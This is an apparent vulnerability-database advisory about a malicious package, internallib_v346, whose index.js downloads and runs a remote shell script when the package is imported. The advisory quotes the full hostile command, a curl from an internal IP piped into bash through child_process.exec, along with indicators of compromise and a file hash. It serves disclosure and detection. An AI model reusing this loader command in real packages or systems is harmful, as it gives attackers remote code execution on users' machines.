VDB
GCVE-110-OSM-2026-5271
GCVE-110-OSM-2026-5271
Advisory PublishedCVSS 9.6/10
The package contains a literal `curl http://10.0.56.229:8000/shell.sh | bash` command executed via `child_process.exec` in index.js. The console.log message ('Baixando e executando o shell da minha maquina...') translates from Portuguese as 'Downloading and executing the shell from my machine,' confirming deliberate intent. The attacker model is a remote shell loader: on import the package fetches and executes an arbitrary shell script from an attacker-controlled internal IP. The package was created and iterated rapidly (5 versions in ~2 hours) by a brand-new single-package publisher with no metadata, consistent with iterative payload testing before broader distribution.
Entrypoint: index.js (main: index.js)
Payload: index.js
Key findings:
- Curl/Wget Pipe to Shell in index.js: "curl http://10.0.56.229:8000/shell.sh | bash"
- Shell Command Execution in index.js: "require('child_process')"
- Brand New Package
- Rapid Version Publishing
IOCs:
- urls: http://0.0.0.0:4873/, http://10.0.56.229:8000/shell.sh
- domains: shell.sh
- payloadFileHash: 9adcf6f9d1df071c91dbc688f6ddc5f246567beab4fd2d2739c8d32d02e5d0d6
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | internallib_v346 | all (affected), all (affected) | — |
Browse GCVE Records
73,053 records in the GCVE database · Updated July 16, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.